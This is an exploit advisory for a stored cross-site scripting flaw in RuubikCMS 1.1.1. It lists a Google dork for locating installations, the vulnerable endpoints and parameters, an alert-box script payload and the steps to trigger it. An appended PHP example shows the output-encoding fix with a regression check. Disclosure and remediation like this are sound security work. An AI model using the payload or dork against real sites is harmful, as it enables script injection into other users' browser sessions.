# Exploit Title: [ruubikcms v1.1.1 Stored XSS]
# Google Dork: [powered by ruubikcms]
# Date: [2013-6-5]
# Exploit Author: [expl0i13r]
# Vendor Homepage: [http://www.ruubikcms.com/]
# Software Link: [http://www.ruubikcms.com/ruubikcms/download.php?f=ruubikcms111.zip]
# Version: [1.1.1]
# Tested on: [Windows 7]
# Contact: expl0i13r@gmail.com

Description:
-------------
RuubikCMS is an open source website content management tool which is designed to be user-friendly for both the end-user and the webmaster.

ruubikcms v1.1.1 suffers from a Stored XSS vulnerability when parsing user input to the 'name' parameter via the POST method through '/ruubikcms/ruubikcms/cms/index.php'. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session.

Tested on : Windows 7
Browsers: Chrome, Internet Explorer, Firefox

POC of the vulnerabilities :
-----------------------------
Stored XSS Vulnerable URLs
----------------------------
http://127.0.0.1/ruubikcms/ruubikcms/cms/index.php [vulnerable : name]
http://127.0.0.1/ruubikcms/ruubikcms/cms/extranet.php?p=member-area [vulnerable : name]
http://127.0.0.1/ruubikcms/ruubikcms/cms/sitesetup.php [Vulnerable : name , siteroot]
http://127.0.0.1/ruubikcms/ruubikcms/cms/users.php?role=5&p=test [Vulnerable : firstname , lastname]

p@yl0ad : "><script>alert('h@cK3d by eXpl0i13r')</script>

Example: Page management > Page name
1. Enter pAyl0ad : "><script>alert('h@cK3d by eXpl0i13r')</script> in: "Page management" > "Page name" textbox
2. Refresh the page and click on Free Pages, and the p0p up will come.
3. Also click on the tab "News", which will load our injected XSS code; it will be available in the drop down menu : News > Link to page (optional)

# blackpentesters.blogspot.com [2013-6-5]
# infotech-knowledge.blogspot.com
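The fix for this class of bug is to encode stored values at the point of output. The following is an added example, not RuubikCMS code and not part of the original advisory: it renders a stored page name into a drop-down option, unencoded and then encoded. The function names, the row layout and the `<option>` markup are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Encode a stored value for HTML text or a quoted attribute value.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Before: the stored name is concatenated into the markup unchanged,
// so a leading "> closes the attribute and the tag.
function render_options_unsafe(array $pages): string
{
    $html = '';
    foreach ($pages as $page) {
        $html .= '<option value="' . $page['name'] . '">' . $page['name'] . "</option>\n";
    }
    return $html;
}

// After: every stored field is encoded where it is written out.
function render_options_safe(array $pages): string
{
    $html = '';
    foreach ($pages as $page) {
        $html .= '<option value="' . e($page['name']) . '">' . e($page['name']) . "</option>\n";
    }
    return $html;
}

// Constructed sample rows standing in for stored page records
// (hypothetical layout; the second name is the payload from the advisory).
$pages = [
    ['name' => 'About us'],
    ['name' => '"><script>alert(\'h@cK3d by eXpl0i13r\')</script>'],
];

$unsafe = render_options_unsafe($pages);
$safe   = render_options_safe($pages);

// Regression check: the encoded output must contain no raw script tag
// and must carry the quote and angle brackets as entities.
if (strpos($unsafe, '<script>') === false) { throw new RuntimeException('unsafe path changed'); }
if (strpos($safe, '<script>') !== false)   { throw new RuntimeException('raw tag in output'); }
if (strpos($safe, '&quot;&gt;&lt;script&gt;') === false) { throw new RuntimeException('not encoded'); }

echo "unsafe:\n", $unsafe, "\nsafe:\n", $safe;
```

Because the encoding is applied on output rather than on input, rows that were stored before the fix are rendered inert as well.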